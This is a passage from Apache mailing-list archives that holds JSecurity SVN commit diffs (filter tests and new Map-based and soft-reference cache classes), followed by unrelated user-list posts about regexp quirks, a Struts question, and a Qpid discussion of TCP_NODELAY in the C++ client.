incubator/jsecurity/trunk/test/org/jsecurity/web/DefaultWebSecurityManagerTest.java Sun Dec 28 11:51:41 2008 @@ -29,26 +29,23 @@ */ public class DefaultWebSecurityManagerTest { + private DefaultWebSecurityManager sm; + @Before public void setup() { + sm = new DefaultWebSecurityManager(); ThreadContext.clear(); } @After public void tearDown() { + sm.destroy(); ThreadContext.clear(); } @Test - public void simpleWebSecurityManagerInit() { - DefaultWebSecurityManager dwsm = new DefaultWebSecurityManager(); - dwsm.destroy(); + public void jsecuritySessionModeInit() { + sm.setSessionMode(DefaultWebSecurityManager.JSECURITY_SESSION_MODE); } - @Test - public void jsecuritySessionModeWebSecurityManagerInit() { - DefaultWebSecurityManager dwsm = new DefaultWebSecurityManager(); - dwsm.setSessionMode(DefaultWebSecurityManager.JSECURITY_SESSION_MODE); - dwsm.destroy(); - } } Modified: incubator/jsecurity/trunk/test/org/jsecurity/web/servlet/JSecurityFilterTest.java URL: http://svn.apache.org/viewvc/incubator/jsecurity/trunk/test/org/jsecurity/web/servlet/JSecurityFilterTest.java?rev=729768&r1=729767&r2=729768&view=diff ============================================================================== --- incubator/jsecurity/trunk/test/org/jsecurity/web/servlet/JSecurityFilterTest.java (original) +++ incubator/jsecurity/trunk/test/org/jsecurity/web/servlet/JSecurityFilterTest.java Sun Dec 28 11:51:41 2008 @@ -19,10 +19,16 @@ package org.jsecurity.web.servlet; import static org.easymock.EasyMock.*; +import org.jsecurity.util.ThreadContext; +import org.junit.After; +import org.junit.Before; import org.junit.Test; +import javax.servlet.FilterChain; import javax.servlet.FilterConfig; import javax.servlet.ServletContext; +import javax.servlet.http.HttpServletRequest; +import javax.servlet.http.HttpServletResponse; /** * @author Les Hazlewood @@ -30,13 +36,27 @@ */ public class JSecurityFilterTest { + private static final String FILTER_NAME = "JSecurityFilter"; + private JSecurityFilter filter; private FilterConfig mockFilterConfig; private ServletContext mockServletContext; + private FilterChain mockFilterChain; + + @Before + public void setUp() { + ThreadContext.clear(); + } + + @After + public void tearDown() { + ThreadContext.clear(); + } protected void setUp(String config) { mockFilterConfig = createMock(FilterConfig.class); mockServletContext = createMock(ServletContext.class); + mockFilterChain = createNiceMock(FilterChain.class); expect(mockFilterConfig.getServletContext()).andReturn(mockServletContext); expect(mockFilterConfig.getInitParameter(JSecurityFilter.CONFIG_CLASS_NAME_INIT_PARAM_NAME)).andReturn(null).once(); @@ -44,18 +64,6 @@ expect(mockFilterConfig.getInitParameter(JSecurityFilter.CONFIG_URL_INIT_PARAM_NAME)).andReturn(null).once(); } - public void tearDown() throws Exception { - reset(mockServletContext); - reset(mockFilterConfig); - - replay(mockServletContext); - - //this.filter.destroy(); - - verify(mockServletContext); - verify(mockFilterConfig); - } - protected void replayAndVerify() throws Exception { replay(mockServletContext); replay(mockFilterConfig); @@ -63,7 +71,6 @@ this.filter = new JSecurityFilter(); this.filter.init(mockFilterConfig); - verify(mockFilterConfig); verify(mockServletContext); } @@ -81,4 +88,52 @@ "authc.successUrl = /index.jsp"); replayAndVerify(); } + + protected void testRequest(String config) throws Exception { + setUp(config); + expect(mockFilterConfig.getFilterName()).andReturn(FILTER_NAME); + replay(mockServletContext); + replay(mockFilterConfig); + + filter = new JSecurityFilter(); + filter.init(mockFilterConfig); + + HttpServletRequest mockRequest = createNiceMock(HttpServletRequest.class); + mockRequest.setAttribute(FILTER_NAME + JSecurityFilter.ALREADY_FILTERED_SUFFIX, Boolean.TRUE); + + HttpServletResponse mockResponse = createNiceMock(HttpServletResponse.class); + + replay(mockRequest); + + filter.doFilter(mockRequest, mockResponse, mockFilterChain); + + verify(mockRequest); + verify(mockFilterConfig); + verify(mockServletContext); + } + + /** + * Along with {@link #testSimpleRequestJSecuritySessionMode()}, this method asserts that + * <a href="https://issues.apache.org/jira/browse/JSEC-33">JSEC-33</a> is resolved. + * + * @throws Exception if an error occurs + */ + @Test + public void testSimpleRequest() throws Exception { + testRequest(null); + } + + /** + * Along with {@link #testSimpleRequest()}, this method asserts that + * <a href="https://issues.apache.org/jira/browse/JSEC-33">JSEC-33</a> is resolved. + * + * @throws Exception if an error occurs + */ + @Test + public void testSimpleRequestJSecuritySessionMode() throws Exception { + String config = "[main]\n" + + "securityManager.sessionMode = jsecurity"; + testRequest(config); + + } } From [email protected] Sun Dec 28 23:51:45 2008 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 14927 invoked from network); 28 Dec 2008 23:51:45 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 28 Dec 2008 23:51:45 -0000 Received: (qmail 11615 invoked by uid 500); 28 Dec 2008 23:51:45 -0000 Delivered-To: [email protected] Received: (qmail 11606 invoked by uid 500); 28 Dec 2008 23:51:44 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <jsecurity-commits.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 11595 invoked by uid 99); 28 Dec 2008 23:51:44 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 28 Dec 2008 15:51:44 -0800 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 28 Dec 2008 23:51:37 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 7872023888E6; Sun, 28 Dec 2008 15:51:17 -0800 (PST) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r729811 - in /incubator/jsecurity/trunk/src/org/jsecurity: cache/DefaultCacheManager.java cache/HashtableCache.java cache/HashtableCacheManager.java cache/MapCache.java cache/SoftHashMapCache.java util/SoftHashMap.java Date: Sun, 28 Dec 2008 23:51:17 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: lhazlewood Date: Sun Dec 28 15:51:16 2008 New Revision: 729811 URL: http://svn.apache.org/viewvc?rev=729811&view=rev Log: JSEC-40 - added initial CacheManager implementations potentially to be used in 1.0 Added: incubator/jsecurity/trunk/src/org/jsecurity/cache/DefaultCacheManager.java incubator/jsecurity/trunk/src/org/jsecurity/cache/MapCache.java incubator/jsecurity/trunk/src/org/jsecurity/cache/SoftHashMapCache.java incubator/jsecurity/trunk/src/org/jsecurity/util/SoftHashMap.java Modified: incubator/jsecurity/trunk/src/org/jsecurity/cache/HashtableCache.java incubator/jsecurity/trunk/src/org/jsecurity/cache/HashtableCacheManager.java Added: incubator/jsecurity/trunk/src/org/jsecurity/cache/DefaultCacheManager.java URL: http://svn.apache.org/viewvc/incubator/jsecurity/trunk/src/org/jsecurity/cache/DefaultCacheManager.java?rev=729811&view=auto ============================================================================== --- incubator/jsecurity/trunk/src/org/jsecurity/cache/DefaultCacheManager.java (added) +++ incubator/jsecurity/trunk/src/org/jsecurity/cache/DefaultCacheManager.java Sun Dec 28 15:51:16 2008 @@ -0,0 +1,59 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one + * or more contributor license agreements. See the NOTICE file + * distributed with this work for additional information + * regarding copyright ownership. The ASF licenses this file + * to you under the Apache License, Version 2.0 (the + * "License"); you may not use this file except in compliance + * with the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, + * software distributed under the License is distributed on an + * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY + * KIND, either express or implied. See the License for the + * specific language governing permissions and limitations + * under the License. + */ +package org.jsecurity.cache; + +import java.util.HashMap; +import java.util.Map; + +/** + * Default memory-only based {@link CacheManager CacheManager} implementation usable in production environments. + * <p/> + * This implementation does not offer any enterprise-level features such as cache coherency, optimistic locking, + * failover or other similar features. It relies on memory-based {@link java.util.Map Map} caches. For more + * enterprise features, consider using an {@link org.jsecurity.cache.ehcache.EhCacheManager EhCacheManager} or other + * similar implementation that wraps an enterprise-grade Caching solution. + * + * @author Les Hazlewood + * @since 1.0 + */ +public class DefaultCacheManager implements CacheManager { + + /** + * Retains all Cache objects maintained by this cache manager. + */ + private final Map<String, Cache> caches = new HashMap<String, Cache>(); + + public Cache getCache(String name) throws CacheException { + if (name == null) { + throw new CacheException("Cache name cannot be null."); + } + + Cache cache; + + synchronized (caches) { + cache = caches.get(name); + if (cache == null) { + cache = new SoftHashMapCache(name); + caches.put(name, cache); + } + } + + return cache; + } +} Modified: incubator/jsecurity/trunk/src/org/jsecurity/cache/HashtableCache.java URL: http://svn.apache.org/viewvc/incubator/jsecurity/trunk/src/org/jsecurity/cache/HashtableCache.java?rev=729811&r1=729810&r2=729811&view=diff ============================================================================== --- incubator/jsecurity/trunk/src/org/jsecurity/cache/HashtableCache.java (original) +++ incubator/jsecurity/trunk/src/org/jsecurity/cache/HashtableCache.java Sun Dec 28 15:51:16 2008 @@ -18,82 +18,30 @@ */ package org.jsecurity.cache; -import java.util.*; +import java.util.Hashtable; /** * An implementation of the JSecurity {@link Cache} interface that uses a * {@link Hashtable} to store cached objects. This implementation is only suitable for - * development/testing use. A more robust caching solution should be used for production - * systems such as the {@link org.jsecurity.cache.ehcache.EhCacheManager} + * development/testing use as it is prone to a potential memory leak if objects are not explicitly removed + * from the cache. * * @author Jeremy Haile * @author Les Hazlewood * @since 0.2 */ -@SuppressWarnings("unchecked") -public class HashtableCache implements Cache { +public class HashtableCache extends MapCache { /** - * The underlying hashtable. - */ - private final Map hashtable = new Hashtable(); - - /** - * The name of this cache. - */ - private final String name; - - /** - * Creates a new cache with the given name. + * Creates a new <code>HashtableCache</code> instance with the specified name. + * <p/> + * This constructor simply calls <code>super(name, new {@link Hashtable Hashtable}());</code> * - * @param name the name of this cache. + * @param name the name to assign to the cache. + * @since 1.0 */ public HashtableCache(String name) { - this.name = name; + super(name, new Hashtable()); } - public Object get(Object key) throws CacheException { - return hashtable.get(key); - } - - public void put(Object key, Object value) throws CacheException { - hashtable.put(key, value); - } - - public void remove(Object key) throws CacheException { - hashtable.remove(key); - } - - public void clear() throws CacheException { - hashtable.clear(); - } - - public int size() { - return hashtable.size(); - } - - public Set keys() { - if (!hashtable.isEmpty()) { - return Collections.unmodifiableSet(hashtable.keySet()); - } else { - return Collections.EMPTY_SET; - } - } - - public Set values() { - if (!hashtable.isEmpty()) { - Collection values = hashtable.values(); - if (values instanceof Set) { - return Collections.unmodifiableSet((Set) values); - } else { - return Collections.unmodifiableSet(new LinkedHashSet(values)); - } - } else { - return Collections.EMPTY_SET; - } - } - - public String toString() { - return "HashtableCache [" + name + "]"; - } } \ No newline at end of file Modified: incubator/jsecurity/trunk/src/org/jsecurity/cache/HashtableCacheManager.java URL: http://svn.apache.org/viewvc/incubator/jsecurity/trunk/src/org/jsecurity/cache/HashtableCacheManager.java?rev=729811&r1=729810&r2=729811&view=diff ============================================================================== --- incubator/jsecurity/trunk/src/org/jsecurity/cache/HashtableCacheManager.java (original) +++ incubator/jsecurity/trunk/src/org/jsecurity/cache/HashtableCacheManager.java Sun Dec 28 15:51:16 2008 @@ -20,6 +20,10 @@ /** * A {@link CacheManager} that returns {@link HashtableCache} caches. + * <p/> + * This implementation is only suitable for development/testing as hashtable-based caches are prone to + * potential memory leaks if objects are not explicitly removed from these caches over time. If you are configuring + * your own cache manager, consider using a production quality * * @author Jeremy Haile * @author Les Hazlewood Added: incubator/jsecurity/trunk/src/org/jsecurity/cache/MapCache.java URL: http://svn.apache.org/viewvc/incubator/jsecurity/trunk/src/org/jsecurity/cache/MapCache.java?rev=729811&view=auto ============================================================================== --- incubator/jsecurity/trunk/src/org/jsecurity/cache/MapCache.java (added) +++ incubator/jsecurity/trunk/src/org/jsecurity/cache/MapCache.java Sun Dec 28 15:51:16 2008 @@ -0,0 +1,94 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one + * or more contributor license agreements. See the NOTICE file + * distributed with this work for additional information + * regarding copyright ownership. The ASF licenses this file + * to you under the Apache License, Version 2.0 (the + * "License"); you may not use this file except in compliance + * with the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, + * software distributed under the License is distributed on an + * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY + * KIND, either express or implied. See the License for the + * specific language governing permissions and limitations + * under the License. + */ +package org.jsecurity.cache; + +import java.util.*; + +/** + * A <code>MapCache</code> is a {@link Cache Cache} implementation that uses a backing {@link Map} instance to store + * and retrieve cached data. + * + * @author Les Hazlewood + * @since 1.0 + */ +public class MapCache implements Cache { + + /** + * Backing instance. + */ + private final Map map; + + /** + * The name of this cache. + */ + private final String name; + + public MapCache(String name, Map backingMap) { + this.name = name; + this.map = backingMap; + } + + public Object get(Object key) throws CacheException { + return map.get(key); + } + + @SuppressWarnings({"unchecked"}) + public void put(Object key, Object value) throws CacheException { + map.put(key, value); + } + + public void remove(Object key) throws CacheException { + map.remove(key); + } + + public void clear() throws CacheException { + map.clear(); + } + + public int size() { + return map.size(); + } + + @SuppressWarnings({"unchecked"}) + public Set keys() { + if (!map.isEmpty()) { + return Collections.unmodifiableSet(map.keySet()); + } else { + return Collections.EMPTY_SET; + } + } + + @SuppressWarnings({"unchecked"}) + public Set values() { + if (!map.isEmpty()) { + Collection values = map.values(); + if (values instanceof Set) { + return Collections.unmodifiableSet((Set) values); + } else { + return Collections.unmodifiableSet(new LinkedHashSet(values)); + } + } else { + return Collections.EMPTY_SET; + } + } + + public String toString() { + return "MapCache [" + name + "]"; + } +} Added: incubator/jsecurity/trunk/src/org/jsecurity/cache/SoftHashMapCache.java URL: http://svn.apache.org/viewvc/incubator/jsecurity/trunk/src/org/jsecurity/cache/SoftHashMapCache.java?rev=729811&view=auto ============================================================================== --- incubator/jsecurity/trunk/src/org/jsecurity/cache/SoftHashMapCache.java (added) +++ incubator/jsecurity/trunk/src/org/jsecurity/cache/SoftHashMapCache.java Sun Dec 28 15:51:16 2008 @@ -0,0 +1,44 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one + * or more contributor license agreements. See the NOTICE file + * distributed with this work for additional information + * regarding copyright ownership. The ASF licenses this file + * to you under the Apache License, Version 2.0 (the + * "License"); you may not use this file except in compliance + * with the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, + * software distributed under the License is distributed on an + * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY + * KIND, either express or implied. See the License for the + * specific language governing permissions and limitations + * under the License. + */ +package org.jsecurity.cache; + +import org.jsecurity.util.SoftHashMap; + +/** + * A MapCache that uses a {@link SoftHashMap SoftHashMap} as its backing map. + * <p/> + * This implementation is suitable in production environments, but does not offer any enterprise features like + * cache coherency, replication, optimistic locking, or other features. It is only a memory-constrained map. + * + * @author Les Hazlewood + * @since 1.0 + */ +public class SoftHashMapCache extends MapCache { + + /** + * Creates a new <code>SoftHashMapCache</code> instance with the specified name. + * <p/> + * This constructor simply calls <code>super(name, new {@link SoftHashMap SoftHashMap}());</code> + * + * @param name the name to assign to the cache. + */ + public SoftHashMapCache(String name) { + super(name, new SoftHashMap()); + } +} Added: incubator/jsecurity/trunk/src/org/jsecurity/util/SoftHashMap.java URL: http://svn.apache.org/viewvc/incubator/jsecurity/trunk/src/org/jsecurity/util/SoftHashMap.java?rev=729811&view=auto ============================================================================== --- incubator/jsecurity/trunk/src/org/jsecurity/util/SoftHashMap.java (added) +++ incubator/jsecurity/trunk/src/org/jsecurity/util/SoftHashMap.java Sun Dec 28 15:51:16 2008 @@ -0,0 +1,175 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one + * or more contributor license agreements. See the NOTICE file + * distributed with this work for additional information + * regarding copyright ownership. The ASF licenses this file + * to you under the Apache License, Version 2.0 (the + * "License"); you may not use this file except in compliance + * with the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, + * software distributed under the License is distributed on an + * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY + * KIND, either express or implied. See the License for the + * specific language governing permissions and limitations + * under the License. + */ +package org.jsecurity.util; + +import java.lang.ref.ReferenceQueue; +import java.lang.ref.SoftReference; +import java.util.*; + +/** + * A <code><em>Soft</em>HashMap</code> is a memory-constrained map that stores its <em>values</em> in + * {@link SoftReference SoftReference}s. (Contrast this with the JDK's + * {@link WeakHashMap WeakHashMap}, which uses weak references for its <em>keys</em>, which is of little value if you + * want the cache to auto-resize itself based on memory constraints). + * <p/> + * Having the values wrapped by soft references allows the cache to automatically reduce its size based on memory + * limitations and garbage collection. This ensures that the cache will not cause memory leaks by holding hard + * references to all of its values. + * <p/> + * This class is a generics-enabled Map based on initial ideas from Hienz Kabutz's and Sydney Redelinghuys's + * <a href="http://www.javaspecialists.eu/archive/Issue015.html">publicly posted version</a>, with continued + * modifications. + * + * @author Les Hazlewood + * @since 1.0 + */ +public class SoftHashMap<K, V> extends AbstractMap<K, V> { + + /** + * The default value of the HARD_SIZE attribute, equal to 100. + */ + private static final int DEFAULT_HARD_SIZE = 100; + + /** + * The internal HashMap that will hold the SoftReference. + */ + private final Map<K, SoftValue<V, K>> map = new HashMap<K, SoftValue<V, K>>(); + + /** + * The number of &quot;hard&quot; references to hold internally, that is, the number of instances to prevent + * from being garbage collected automatically (unlike other soft references). + */ + private final int HARD_SIZE; + + /** + * The FIFO list of hard references (not to be garbage collected), order of last access. + */ + private final LinkedList<V> hardCache = new LinkedList<V>(); + + /** + * Reference queue for cleared SoftReference objects. + */ + private final ReferenceQueue<? super V> queue = new ReferenceQueue<V>(); + + public SoftHashMap() { + this(DEFAULT_HARD_SIZE); + } + + public SoftHashMap(int hardSize) { + HARD_SIZE = hardSize; + } + + public V get(Object key) { + + V result = null; + + SoftValue<V, K> value = map.get(key); + + if (value != null) { + //unwrap the 'real' value from the SoftReference + result = value.get(); + if (result == null) { + //The wrapped value was garbage collected, so remove this entry from the backing map: + map.remove(key); + } else { + //Add this value to the beginning of the 'hard' reference queue (FIFO). + hardCache.addFirst(result); + + //trim the hard ref queue if necessary: + if (hardCache.size() > HARD_SIZE) { + hardCache.removeLast(); + } + } + } + return result; + } + + /** + * We define our own subclass of SoftReference which contains + * not only the value but also the key to make it easier to find + * the entry in the HashMap after it's been garbage collected. + */ + private static class SoftValue<V, K> extends SoftReference<V> { + + private final K key; + + /** + * Constructs a new instance, wrapping the value, key, and queue, as + * required by the superclass. + * + * @param value the map value + * @param key the map key + * @param queue the soft reference queue to poll to determine if the entry had been reaped by the GC. + */ + private SoftValue(V value, K key, ReferenceQueue<? super V> queue) { + super(value, queue); + this.key = key; + } + } + + /** + * Traverses the ReferenceQueue and removes garbage-collected SoftValue objects from the backing map + * by looking them up using the SoftValue.key data member. + */ + private void processQueue() { + SoftValue sv; + while ((sv = (SoftValue) queue.poll()) != null) { + map.remove(sv.key); // we can access private data! + } + } + + /** + * Creates a new entry, but wraps the value in a SoftValue instance to enable auto garbage collection. + */ + public V put(K key, V value) { + processQueue(); // throw out garbage collected values first + SoftValue<V, K> sv = new SoftValue<V, K>(value, key, queue); + return map.put(key, sv).get(); + } + + public V remove(Object key) { + processQueue(); // throw out garbage collected values first + SoftValue<V, K> raw = map.remove(key); + V removed = null; + if (raw != null) { + removed = raw.get(); + } + return removed; + } + + public void clear() { + hardCache.clear(); + processQueue(); // throw out garbage collected values + map.clear(); + } + + public int size() { + processQueue(); // throw out garbage collected values first + return map.size(); + } + + @SuppressWarnings({"unchecked"}) + public Set<Map.Entry<K, V>> entrySet() { + processQueue(); // throw out garbage collected values first + Set set = map.entrySet(); + return Collections.unmodifiableSet(set); + } + + +}
From [email protected] Thu Mar 15 18:25:20 2001 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 10295 invoked by uid 500); 15 Mar 2001 18:25:05 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk Reply-To: [email protected] list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 10233 invoked from network); 15 Mar 2001 18:24:56 -0000 Message-Id: <[email protected]> Date: Thu, 15 Mar 2001 13:20:57 -0500 (EST) From: Ed Chidester <[email protected]> Reply-To: Ed Chidester <[email protected]> Subject: Re: Closure ist terrible slow To: [email protected] MIME-Version: 1.0 Content-Type: TEXT/plain; charset=us-ascii Content-MD5: pbCGCQUqkV4vXA5vVkGimg== X-Mailer: dtmail 1.2.1 CDE Version 1.2.1 SunOS 5.6 sun4m sparc X-Spam-Rating: h31.sny.collab.net 1.6.2 0/1000/N Hi, I just added myself to this mailing list and have only seen the postings from last month (so forgive me if this thread has been worked to a satisfactory conclusion). I have also found that regexp patterns which use { min , max } quantification can become extremely slow. It appears to be an exponential increase in time with relation to (max - min). Also, on an unrelated note, I just posted a bug report (#986) because I found that word boundaries ("\b") don't work unless they're at the very end of a pattern. Thanks, Ed. // Edward Chidester // Software Engineer MNIS - Textwise Labs // +1-413-210-8791 401 South Salina Street // [email protected] Syracuse, NY 13202 From [email protected] Fri Mar 30 18:32:27 2001 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 2920 invoked by uid 500); 30 Mar 2001 18:32:20 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk Reply-To: [email protected] list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 2847 invoked from network); 30 Mar 2001 18:32:16 -0000 From: Daniel Serodio <[email protected]> X-Authentication-Warning: ns1.ibnetwork.com.br: nobody set sender to [email protected] using -f To: [email protected] Subject: POSIX character classes Message-ID: <[email protected]> Date: Fri, 30 Mar 2001 16:37:19 -0300 (BRT) MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 8bit User-Agent: IMP/PHP IMAP webmail program 2.2.2 X-Originating-IP: 161.129.204.104 X-Spam-Rating: h31.sny.collab.net 1.6.2 0/1000/N Hi! I've been using the Regexp package, and while it great, I think it's syntax for character classes is non-standard. I've never seen the POSIX specification, but most tools implement it differently. Here's the issue: In POSIX, the syntax for a 'named' character class is, e.g. '[:alpha:]', but only if it comes inside brackets (that is, inside a character class). Thus, to match a single alphabetic char, you use '[[:alpha:]]'. To illustrate, this piece is from GNU grep(1) man page: "(Note that the brackets in these class names are part of the symbolic names, and must be included in addition to the brackets delimiting the bracket list.)" In Regexp, the syntax '[[:alpha:]]' is not accepted: org.apache.regexp.RESyntaxException Syntax error: Mismatched class I must use '[:alpha:]' instead. This way, if I want to match an alphabetic char or a space, I must use '([:alpha:]| )' instead of the usual '[[:alpha:] ]' (which is supposed to be faster, BTW). Can someone explain this strange behaviour? Bug? Thanks, Daniel Serodio From [email protected] Fri Mar 30 20:05:46 2001 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 17059 invoked by uid 500); 30 Mar 2001 20:05:43 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk Reply-To: [email protected] list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 17050 invoked from network); 30 Mar 2001 20:05:42 -0000 Message-ID: <[email protected]> Date: Fri, 30 Mar 2001 15:05:45 -0500 (EST) From: Yuriy Zubarev <[email protected]> Subject: bean in session To: [email protected] MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Spam-Rating: h31.sny.collab.net 1.6.2 0/1000/N Hello friends, I would like to ask if someone knows how to check for some bean presence/absence in jsp page by means of <logic:..> tags. Thank you for your time. Best of luck, Yuriy Zubarev _______________________________________________________ Do You Yahoo!? Get your free @yahoo.ca address at http://mail.yahoo.ca From [email protected] Fri Mar 30 20:47:04 2001 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 72153 invoked by uid 500); 30 Mar 2001 20:47:01 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk Reply-To: [email protected] list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 72011 invoked from network); 30 Mar 2001 20:46:58 -0000 Message-ID: <[email protected]> Date: Fri, 30 Mar 2001 15:46:58 -0500 From: Ted Husted <[email protected]> Organization: Apache Jakarta Project X-Mailer: Mozilla 4.75 [en] (WinNT; U) X-Accept-Language: en MIME-Version: 1.0 To: [email protected] Subject: Re: bean in session References: <[email protected]> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-Spam-Rating: h31.sny.collab.net 1.6.2 0/1000/N Did you mean to post this to the Struts User list, Yuriy? Yuriy Zubarev wrote: > > Hello friends, > > I would like to ask if someone knows how to check for some bean > presence/absence in jsp page by means of <logic:..> tags. > > Thank you for your time. > > Best of luck, > Yuriy Zubarev > > _______________________________________________________ > Do You Yahoo!? > Get your free @yahoo.ca address at http://mail.yahoo.ca
From [email protected] Thu Apr 03 09:27:07 2008 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 51106 invoked from network); 3 Apr 2008 09:27:05 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 3 Apr 2008 09:27:05 -0000 Received: (qmail 31011 invoked by uid 500); 3 Apr 2008 09:27:01 -0000 Delivered-To: [email protected] Received: (qmail 30988 invoked by uid 500); 3 Apr 2008 09:27:00 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <qpid-users.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 30958 invoked by uid 99); 3 Apr 2008 09:27:00 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 03 Apr 2008 02:27:00 -0700 X-ASF-Spam-Status: No, hits=-4.0 required=10.0 tests=RCVD_IN_DNSWL_MED,SPF_HELO_PASS,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (nike.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO mx1.redhat.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 03 Apr 2008 09:26:09 +0000 Received: from int-mx1.corp.redhat.com (int-mx1.corp.redhat.com [161.129.204.104]) by mx1.redhat.com (8.13.8/8.13.8) with ESMTP id m339QS0n032276; Thu, 3 Apr 2008 05:26:28 -0400 Received: from lacrosse.corp.redhat.com (lacrosse.corp.redhat.com [161.129.204.104]) by int-mx1.corp.redhat.com (8.13.1/8.13.1) with ESMTP id m339QS9R020498; Thu, 3 Apr 2008 05:26:28 -0400 Received: from [161.129.204.104] (vpn-4-68.str.redhat.com [161.129.204.104]) by lacrosse.corp.redhat.com (161.129.204.10460308/8.11.6) with ESMTP id m339QR6d030058; Thu, 3 Apr 2008 05:26:27 -0400 Message-ID: <[email protected]> Date: Thu, 03 Apr 2008 10:26:22 +0000 From: Gordon Sim <[email protected]> Organization: Registered Address: Red Hat UK Ltd, Amberley Place, 107-111 Peascod Street, Windsor, Berkshire, SI4 1TE, United Kingdom.,Registered in England and Wales under Company Registration No. 3798903,Directors: Michael Cunningham (USA), Charlie Peters (USA) and David Owens (Ireland) User-Agent: Thunderbird 161.129.204.104 (X11/20060501) MIME-Version: 1.0 To: [email protected], [email protected] Subject: Re: C++: exposing options like TCP_NODELAY References: <[email protected]> <[email protected]> <[email protected]> <[email protected]> In-Reply-To: <[email protected]> Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit X-Scanned-By: MIMEDefang 2.58 on 161.129.204.104 X-Virus-Checked: Checked by ClamAV on apache.org Marnie McCormack wrote: > I think what you are proposing sounds good. Excuse my C++ ignorance, but is > there any way to deprecate SetTcpNoDelay i.e. keep it in there but indicate > that new client apps should not use it ? I ask as I know of at least one > application already using this method in prod. The API for the c++ client has changed significantly between M2 and trunk. We do have an implementation of the old interface mapped to the new one, but that was mainly used for transitioning and my intention was always to remove it. I suspect there would be several issues in upgrading an application from the M2 c++ client to the trunk c++ client (and setting tcp-nodelay would be the least of them!). It is certainly possible to minimise that by providing a legacy 'adapter' of some sort. As always this is going to be a matter of balancing the available effort with the demand from users. As with all feature requests and feedback, I'd encourage users who are planning such a transition and are keen to minimise the impact make their voices heard and we can figure out the best path forward. Ultimately the aim is to have higher level abstractions that would be entirely independent of the protocol version. Applications could program to those abstractions and not worry about the details of the mapping underneath. At present we have the core API in place on trunk that exposes all the AMQP commands and concepts fairly directly. We also have the beginnings of some more abstracted utilities. So its a great time to try it all out and influence the evolution! (One caveat to that: there will be a degree of change as we transition from the 0-10 preview to the 0-10 final version; that should be completed quite soon I expect). From [email protected] Wed Apr 09 11:13:37 2008 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 29395 invoked from network); 9 Apr 2008 11:13:37 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 9 Apr 2008 11:13:37 -0000 Received: (qmail 20536 invoked by uid 500); 9 Apr 2008 11:13:37 -0000 Delivered-To: [email protected] Received: (qmail 20518 invoked by uid 500); 9 Apr 2008 11:13:37 -0000 